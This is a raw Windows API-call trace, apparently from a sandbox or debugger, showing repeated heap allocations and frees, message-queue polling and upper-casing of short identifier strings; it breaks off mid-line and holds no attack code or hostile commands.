RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0168.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0168.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0168.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0168.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0168.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0168.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0168.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0168.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0168.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0168.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0168.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0168.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0168.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0168.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0168.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0168.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0168.757] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0168.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0168.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0168.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0168.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0168.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0168.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0168.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0168.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0168.757] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0168.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0168.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0168.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0168.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0168.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0168.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0168.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0168.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0168.757] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0168.758] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0168.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0168.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0168.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0168.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0168.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0168.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0168.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0168.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0168.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0168.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0168.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0168.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0168.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0168.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0168.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0168.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0168.758] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0168.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0168.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0168.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0168.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0168.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0168.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0168.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0168.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0168.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0168.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0168.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0168.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0168.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0168.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0168.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0168.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0168.762] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0168.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0168.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0168.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0168.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0168.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0168.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0168.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0168.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0168.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0168.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0168.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0168.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0168.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0168.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0168.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0168.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0168.763] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0168.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0168.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0168.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0168.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0168.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0168.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0168.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0168.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0168.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0168.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0168.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0168.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0168.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0168.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0168.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0168.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0168.764] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.764] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0168.764] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0168.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0168.764] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0168.764] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0168.764] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0168.764] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0168.764] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0168.764] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0168.764] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0168.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0168.764] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0168.764] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0168.764] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0168.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0168.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0168.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0168.764] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.764] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0168.764] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0168.764] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0168.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0168.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0168.764] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaac8 [0168.764] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0168.765] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0168.765] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0168.765] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0168.765] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0168.765] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0168.765] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0168.765] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0168.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0168.765] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0168.765] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0168.765] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0168.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0168.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0168.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0168.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0168.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0168.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0168.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0168.765] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0168.765] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0168.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0168.765] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0168.765] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0168.765] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0168.765] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0168.765] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0168.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0168.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0168.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa960 [0168.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74748 [0168.766] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0168.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0168.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0168.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0168.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0168.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0168.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0168.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0168.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0168.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0168.766] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0168.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0168.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0168.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0168.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0168.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0168.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0168.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0168.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0168.766] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0168.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0168.766] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0168.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0168.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0168.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0168.767] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0168.767] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0168.767] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0168.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0168.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0168.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0168.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0168.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0168.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0168.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74748 | out: hHeap=0x2af0000) returned 1 [0168.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0168.767] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0168.767] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70e0 [0168.767] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0168.767] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0168.767] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0168.767] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0168.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0168.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0168.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0168.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0168.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0168.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0168.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0168.767] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0168.767] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0168.768] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0168.768] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0168.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0168.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0168.768] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0168.768] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0168.768] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0168.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaae0 [0168.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73d70 [0168.768] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0168.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0168.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0168.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0168.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0168.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 